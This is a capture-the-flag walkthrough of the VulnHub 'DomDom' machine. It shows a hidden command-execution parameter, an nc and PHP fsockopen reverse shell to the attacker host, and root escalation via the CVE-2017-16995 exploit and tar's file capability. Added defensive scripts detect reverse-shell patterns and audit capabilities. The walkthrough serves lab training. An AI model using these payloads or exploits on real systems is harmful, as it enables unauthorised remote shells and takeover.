DomDom

Download: DomDom: 1 ~ VulnHub

1 Information Gathering

1.1 Port Scan

$ nmap -p - -T4 192.168.50.3 -oA domdom
Nmap scan report for test (192.168.50.3)
Host is up (0.00077s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http

1.2 Directory Scan

$ gobuster dir -u http://192.168.50.3 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/04/01 20:09:53 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 694]
/admin.php (Status: 200) [Size: 329]
/server-status (Status: 403) [Size: 300]
===============================================================
2022/04/01 20:10:26 Finished
===============================================================

1.2.1 Directory Analysis

  1. http://192.168.50.3/index.php: nothing much here; it only echoes back the submitted username.

  2. http://192.168.50.3/admin.php: nothing obvious either. There seems to be a place where commands could be executed, but it is not visible on the page.

  3. Some searching (Baidu) suggests changing the original GET request to http://192.168.50.3/admin.php into a POST request.

  4. When the request body sent to http://192.168.50.3/admin.php contains what was submitted at http://192.168.50.3/index.php, the response gains an extra cmd field.

    1. Request

      POST /admin.php HTTP/1.1
      Host: 192.168.50.3
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      DNT: 1
      Sec-GPC: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 49

      name=id&username=id&password=123456&access=access
    2. Response

      HTTP/1.1 200 OK
      Date: Fri, 01 Apr 2022 11:48:21 GMT
      Server: Apache/2.4.18 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 320
      Connection: close
      Content-Type: text/html; charset=UTF-8

      <html>
      <head>
      <title>
      DomDom
      </title>
      </head>
      <body>
      <form method="POST">
      <input type="text" name="cmd" id="cmd" size="200">
      <br>
      <br>
      <input type="submit" value="Execute">
      </form>
      <pre>
      </pre>
      </body>
      <script>
      document.getElementById("cmd").focus();
      </script>
      </body>
      </html>

2 GetShell

2.1 Attempting Command Execution

  1. Adding a cmd parameter to the http://192.168.50.3/admin.php request body: the command is executed successfully.

    1. Request

      POST /admin.php HTTP/1.1
      Host: 192.168.50.3
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      DNT: 1
      Sec-GPC: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 56

      name=id&username=id&password=123456&access=access&cmd=id
    2. Response

      HTTP/1.1 200 OK
      Date: Fri, 01 Apr 2022 11:58:19 GMT
      Server: Apache/2.4.18 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 383
      Connection: close
      Content-Type: text/html; charset=UTF-8

      <html>
      <head>
      <title>
      DomDom
      </title>
      </head>
      <body>
      <form method="POST">
      <input type="text" name="cmd" id="cmd" size="200">
      <br>
      <br>
      <input type="submit" value="Execute">
      </form>
      <pre>
      uid=33(www-data) gid=33(www-data) groups=33(www-data),27(sudo)
      </pre>
      </body>
      <script>
      document.getElementById("cmd").focus();
      </script>
      </body>
      </html>

2.2 nc Reverse Shell Fails

POST /admin.php HTTP/1.1
Host: 192.168.50.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Origin: http://192.168.50.3
Connection: close
Referer: http://192.168.50.3/admin.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

name=id&username=id&password=123456&access=access&cmd=nc+192.168.50.2+2333

2.3 PHP Reverse Shell

POST /admin.php HTTP/1.1
Host: 192.168.50.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: http://192.168.50.3
Connection: close
Referer: http://192.168.50.3/admin.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

name=id&username=id&password=123456&access=access&cmd=php+-r+'$sock%3dfsockopen("192.168.50.2",2333)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'
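As an added defender-side example (not code from the original writeup): the request bodies shown in sections 2.1 to 2.3 run through a small triage routine that flags the cmd field and the reverse-shell idioms used above. The indicator list and the function name are this example's own.

```python
"""Triage captured form bodies for the DomDom /admin.php command channel.

Added defender-side example (not code from the original writeup): the
handler runs whatever arrives in the ``cmd`` field, so a WAF rule or
log-triage script can key on that field plus common reverse-shell idioms.
Sample bodies are copied from the writeup; the indicator list is constructed.
"""
import re
from urllib.parse import parse_qs

# Reverse-shell idioms matching the writeup's payloads. Constructed list.
REVERSE_SHELL_PATTERNS = {
    "netcat-connect": re.compile(r"\bnc\b.*\d{1,3}(?:\.\d{1,3}){3}\s+\d+"),
    "php-fsockopen": re.compile(r"fsockopen\s*\("),
    "interactive-bash": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "fd-redirect": re.compile(r"[<>]&\d"),
}

# Bodies from the writeup (index.php submission, then sections 2.1 to 2.3).
SAMPLE_BODIES = [
    "name=id&username=id&password=123456&access=access",
    "name=id&username=id&password=123456&access=access&cmd=id",
    "name=id&username=id&password=123456&access=access&cmd=nc+192.168.50.2+2333",
    "name=id&username=id&password=123456&access=access&cmd=php+-r+'$sock%3dfsockopen"
    '("192.168.50.2",2333)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b\'',
]


def triage_body(body: str, exec_param: str = "cmd") -> dict:
    """Verdict for one application/x-www-form-urlencoded body.

    parse_qs URL-decodes the field (+ -> space, %3b -> ;), so the patterns
    run against the command text as the server itself would execute it.
    """
    fields = parse_qs(body, keep_blank_values=True)
    verdict = {"exec_param_present": exec_param in fields,
               "command": None, "indicators": []}
    if not verdict["exec_param_present"]:
        return verdict
    verdict["command"] = fields[exec_param][0]
    verdict["indicators"] = [name for name, rx in REVERSE_SHELL_PATTERNS.items()
                             if rx.search(verdict["command"])]
    return verdict


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        v = triage_body(body)
        print(f"{v['command']!r:70} -> {v['indicators']}")
```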

2.4 GetShell

$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.50.2] from (UNKNOWN) [192.168.50.3] 59400
bash: cannot set terminal process group (1716): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
www-data@ubuntu:/var/www/html$

2.5 Switching to a Python Shell

python3 -c "import pty;pty.spawn('/bin/bash')"

3 Privilege Escalation

3.1 Collecting System Information

  1. Check the current user's sudo privileges: no password available

    www-data@ubuntu:/var/www/html$ sudo -l
    [sudo] password for www-data:
  2. List the files in the web application directory

    www-data@ubuntu:/var/www/html$ ls
    admin.php index.php
  3. Check the /etc/passwd file

    www-data@ubuntu:/var/www/html$ cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/bin/bash
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    syslog:x:104:108::/home/syslog:/bin/false
    _apt:x:105:65534::/nonexistent:/bin/false
    messagebus:x:106:110::/var/run/dbus:/bin/false
    uuidd:x:107:111::/run/uuidd:/bin/false
    lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
    whoopsie:x:109:116::/nonexistent:/bin/false
    avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
    colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
    speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
    hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
    saned:x:119:127::/var/lib/saned:/bin/false
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    domom:x:1000:1000:DomDom,,,:/home/domom:/bin/bash
  4. Check for privilege escalation vulnerabilities:

    www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh
    [+] [CVE-2016-5195] dirtycow 2
    Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
    Exposure: highly probable
    Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
    Download URL: https://www.exploit-db.com/download/40839
    ext-url: https://www.exploit-db.com/download/40847.cpp
    Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

    [+] [CVE-2017-16995] eBPF_verifier
    Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
    Exposure: highly probable
    Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
    Download URL: https://www.exploit-db.com/download/45010
    Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

    [+] [CVE-2016-8655] chocobo_root
    Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
    Exposure: highly probable
    Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
    Download URL: https://www.exploit-db.com/download/40871
    Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

    [+] [CVE-2016-5195] dirtycow
    Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
    Exposure: highly probable
    Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
    Download URL: https://www.exploit-db.com/download/40611
    Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
  5. Escalate privileges using CVE-2017-16995:

    # compile the exploit on Kali
    wget https://www.exploit-db.com/download/45010
    mv 45010 cve-2017-16995.c
    gcc cve-2017-16995.c -o cve-2017-16995
    # upload the compiled cve-2017-16995 binary to the target
    www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ scp kali@192.168.50.2:/home/kali/cve-2017-16995 .

3.3 Privilege Escalation

3.3.1 Privilege Escalation via CVE-2017-16995

Running the exploit binary escalates to root successfully.

www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880231b29600
[*] Leaking sock struct from ffff880232f63c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880231682540
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880231682540
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),27(sudo),33(www-data)
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/var/www/html/linux-exploit-suggester-1.1# cd ~
root@ubuntu:/root# ls
Ry{}LJRBS5nc+*V.#a

3.3.2 Privilege Escalation via Executable File Capabilities

  1. Check the file capability settings on the system

    www-data@ubuntu:/tmp$ getcap -r / 2>/dev/null
    /usr/bin/mtr = cap_net_raw+ep
    /usr/bin/arping = cap_net_raw+ep
    /usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
    /usr/bin/traceroute6.iputils = cap_net_raw+ep
    /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
    /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
    /bin/tar = cap_dac_read_search+ep
  2. Archive root's home directory to obtain the root flag

    www-data@ubuntu:/tmp$ tar -cvf root.tar /root
    tar: Removing leading `/' from member names
    /root/
    /root/.viminfo
    /root/.nano/
    /root/.bash_history
    /root/.cache/
    /root/.profile
    /root/.bashrc
    /root/Ry{}LJRBS5nc+*V.#a
  3. Archive domom's home directory to obtain the root password

    www-data@ubuntu:/tmp$ tar -cvf domom.tar /home/domom/
    www-data@ubuntu:/tmp/home/domom/Desktop$ cat README.md
    Hi Dom, This is the root password: Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a
  4. Successfully log in as root

    www-data@ubuntu:/tmp/home/domom/Desktop$ su - root
    su - root
    Password: Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a
    root@ubuntu:~# ls
    Ry{}LJRBS5nc+*V.#a
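Added example (not part of the original writeup): an audit over the getcap output above that flags capabilities such as the cap_dac_read_search on /bin/tar which let www-data read /root. The risky-capability table and the function names are constructed for this example.

```python
"""Audit ``getcap -r /`` output for file capabilities that defeat DAC.

Added defender-side example (not code from the original writeup): in DomDom,
/bin/tar carrying cap_dac_read_search let www-data archive /root. Parses the
older ``path = caps+ep`` style seen in the writeup and the newer ``path caps=ep``.
"""
import re

RISKY_CAPS = {  # capabilities that alone give access beyond DAC; constructed table
    "cap_dac_read_search": "read any file and traverse any directory",
    "cap_dac_override": "bypass read/write/execute permission checks",
    "cap_sys_ptrace": "attach to and inject into other processes",
    "cap_setuid": "switch to any UID, including root",
    "cap_sys_admin": "broad administrative control (mount, namespaces, ...)",
}

SAMPLE_GETCAP = """\
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/arping = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/bin/tar = cap_dac_read_search+ep
"""  # getcap output copied from the writeup, section 3.3.2


def parse_getcap_line(line: str):
    """Split one non-blank getcap line into (path, {capability names})."""
    if " = " in line:                  # libcap <= 2.4x prints "path = caps+ep"
        path, capspec = line.strip().split(" = ", 1)
    else:                              # libcap >= 2.5x prints "path caps=ep"
        path, _, capspec = line.strip().rpartition(" ")
    caps = set()
    for clause in capspec.split():     # a clause looks like "cap_a,cap_b+ep"
        names = re.split(r"[+=-]", clause, maxsplit=1)[0]  # drop the flag part
        caps.update(n for n in names.split(",") if n.startswith("cap_"))
    return path, caps


def audit_getcap(output: str) -> dict:
    """Map each binary holding a risky capability to {cap: why it matters}."""
    findings = {}
    for line in filter(str.strip, output.splitlines()):   # skip blank lines
        path, caps = parse_getcap_line(line)
        risky = {c: RISKY_CAPS[c] for c in sorted(caps) if c in RISKY_CAPS}
        if risky:
            findings[path] = risky
    return findings
```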
